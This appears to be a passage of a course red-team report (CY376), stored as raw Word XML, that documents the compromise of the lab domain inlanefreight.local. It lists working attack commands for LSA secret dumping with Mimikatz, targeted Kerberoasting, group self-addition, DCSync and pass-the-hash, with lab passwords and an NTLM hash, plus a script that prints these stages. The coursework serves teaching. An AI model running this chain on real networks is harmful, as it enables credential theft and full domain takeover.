                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> /p:'Sys26Admin'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27860CA6" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5CA01445" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 8: Mimikatz LSA Secrets Dump for mssqladm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04367E5A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>mimikatz.exe "</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>privilege::</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>debug" "token::elevate" "lsadump::secrets" "exit"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3999E9A9" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="60A5BD41" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 9: Targeted SPN Injection &amp; Kerberoasting</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="515A3DAE" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD --host 172.16.8.3 -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u mssqladm -p 'DBAilfreight1!' set object ttimmons servicePrincipalName -v 'acmetesting/LEGIT'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DFD189A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">GetUserSPNs.py -dc-ip 172.16.8.3 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>/mssqladm -request-user ttimmons -outputfile ttimmons_tgs.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41A57DFF" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>hashcat -m 13100 ttimmons_tgs.txt /usr/share/wordlists/rockyou.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04DF865E" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E3278C0" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 10: Server Admins Group Self-Addition</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="414F24DB" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">bloodyAD --host 172.16.8.3 -d </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>inlanefreight.local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -u ttimmons -p 'Repeat09' add groupMember "Server Admins" ttimmons</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1445CDDD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="54F744C4" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 11: DCSync Domain Credential Replication Dump</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D15F6DC" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">secretsdump.py </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>ttimmons:'Repeat09'@172.16.8.3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> -just-dc-ntlm</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EAC1FBA" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C49F92F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># Stage 12: Pass-the-Hash Domain Controller Authentication</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE97F60" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>evil-winrm -i 172.16.8.3 -u Administrator -H fd1f7e5564060258ea787ddbb6e6afa2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="298D98E1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382EBC51" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="280" w:after="80"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Appendix B: Proof-of-Concept Automation Scripts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FB3B53" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r w:rsidRPr="0040297F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t>Automated Python script template utilizing Impacket and bloodyAD logic for automated attack-chain verification in lab testing:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9360"/>
      </w:tblGrid>
      <w:tr w:rsidR="0040297F" w:rsidRPr="0040297F" w14:paraId="450D32F5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="1F4E79"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D7DE"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F4F5F7"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="150" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="150" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="081FDF6F" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>#!/</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49CB579A" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t># INLANEFREIGHT.LOCAL Red Team PoC Verification Script</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18EC8437" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>import sys, os</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44990095" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3CB81C5C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>def run_stage_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>check(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>stage, desc, cmd):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E24D327" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    print(f"[+] Stage {stage}: {desc}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C58849" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>f"    Executing: {cmd}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="660A41F1" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3290AA32" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72DE0C5D" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>print(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>"=== INLANEFREIGHT.LOCAL AD Escalation PoC Runner ===")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B8D4192" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    run_stage_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>check(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>1, "Foothold Check", "nxc smb 172.16.8.3 -u hporter -p 'Gr8hambino!'")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05196C90" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    run_stage_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>check(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>3, "ForceChangePassword", "bloodyAD set password ssmalls mazoniakid")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6680B7" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    run_stage_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>check(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>9, "Targeted Kerberoast", "GetUserSPNs.py inlanefreight.local/mssqladm")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6664D35B" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00A25106">
            <w:pPr>
              <w:spacing w:after="40" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    run_stage_</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>check(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0040297F">
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>11, "DCSync Replication", "secretsdump.py ttimmons:'Repeat09'@172.16.8.3")</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2668C63C" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidRDefault="00E142F8">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E142F8" w:rsidRPr="0040297F" w:rsidSect="00B33193">
      <w:headerReference w:type="default" r:id="rId24"/>
      <w:footerReference w:type="defaul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0608B" w14:textId="77777777" w:rsidR="00DB017A" w:rsidRDefault="00DB017A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0540947D" w14:textId="77777777" w:rsidR="00DB017A" w:rsidRDefault="00DB0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0795990"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:color w:val="7F7F7F" w:themeColor="background1" w:themeShade="7F"/>
        <w:spacing w:val="60"/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="7199A56A" w14:textId="79F91B09" w:rsidR="00B33193" w:rsidRDefault="00B3319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9FBF3AA" w14:textId="3E2D7977" w:rsidR="00E142F8" w:rsidRDefault="00E142F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3FB9E" w14:textId="77777777" w:rsidR="00DB017A" w:rsidRDefault="00DB017A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0676723D" w14:textId="77777777" w:rsidR="00DB017A" w:rsidRDefault="00DB0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6DEDD" w14:textId="77777777" w:rsidR="00E142F8" w:rsidRDefault="00A25106">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
        <w:color w:val="888888"/>
        <w:sz w:val="17"/>
      </w:rPr>
      <w:t>CY376: Network Monitoring, Security &amp; Auditing | Red Team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EB"/>
    <w:rsid w:val="00034616"/>
    <w:rsid w:val="0006063C"/>
    <w:rsid w:val="0015074B"/>
    <w:rsid w:val="00162A9A"/>
    <w:rsid w:val="00180350"/>
    <w:rsid w:val="001843BB"/>
    <w:rsid w:val="0029639D"/>
    <w:rsid w:val="00312347"/>
    <w:rsid w:val="00326F90"/>
    <w:rsid w:val="003D457E"/>
    <w:rsid w:val="003F4CF1"/>
    <w:rsid w:val="0040297F"/>
    <w:rsid w:val="00421A4E"/>
    <w:rsid w:val="004400D1"/>
    <w:rsid w:val="004B35C4"/>
    <w:rsid w:val="004C4181"/>
    <w:rsid w:val="005B7875"/>
    <w:rsid w:val="00603C6A"/>
    <w:rsid w:val="00782646"/>
    <w:rsid w:val="007C45C0"/>
    <w:rsid w:val="0087495E"/>
    <w:rsid w:val="009935D5"/>
    <w:rsid w:val="009F4D67"/>
    <w:rsid w:val="00A16038"/>
    <w:rsid w:val="00A25106"/>
    <w:rsid w:val="00A30730"/>
    <w:rsid w:val="00A61A4C"/>
    <w:rsid w:val="00AA1D8D"/>
    <w:rsid w:val="00AA25BA"/>
    <w:rsid w:val="00AA4954"/>
    <w:rsid w:val="00AD3AD1"/>
    <w:rsid w:val="00AE36D8"/>
    <w:rsid w:val="00B13EDF"/>
    <w:rsid w:val="00B33193"/>
    <w:rsid w:val="00B36735"/>
    <w:rsid w:val="00B47730"/>
    <w:rsid w:val="00C36AFA"/>
    <w:rsid w:val="00C6070F"/>
    <w:rsid w:val="00C7419C"/>
    <w:rsid w:val="00CB0664"/>
    <w:rsid w:val="00D661A9"/>
    <w:rsid w:val="00D67FA4"/>
    <w:rsid w:val="00DB017A"/>
    <w:rsid w:val="00E142F8"/>
    <w:rsid w:val="00E278B2"/>
    <w:rsid w:val="00EC6C81"/>
    <w:rsid w:val="00EF73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D830A0"/>
  <w14:defaultImageDpi w14:val="330"/>
  <w15:docId w15:val="{F5F8A582-DE21-44CE-98DD-364B8FA14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28</Pages>
  <Words>5187</Words>
  <Characters>29572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Enoch Oduro Domain Compromise Report</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>34690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Enoch Oduro Domain Compromise Report</dc:title>
  <dc:subject/>
  <dc:creator>Enoch Oduro</dc:creator>
  <cp:keywords>Enoch Oduro Domain Compromise Report</cp:keywords>
  <dc:description>Enoch Oduro Domain Compromise Report</dc:description>
  <cp:lastModifiedBy>Pandemic_maz .</cp:lastModifiedBy>
  <cp:revision>34</cp:revision>
  <cp:lastPrinted>2026-08-02T21:11:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-12-23T23:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-08-11T05:32:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>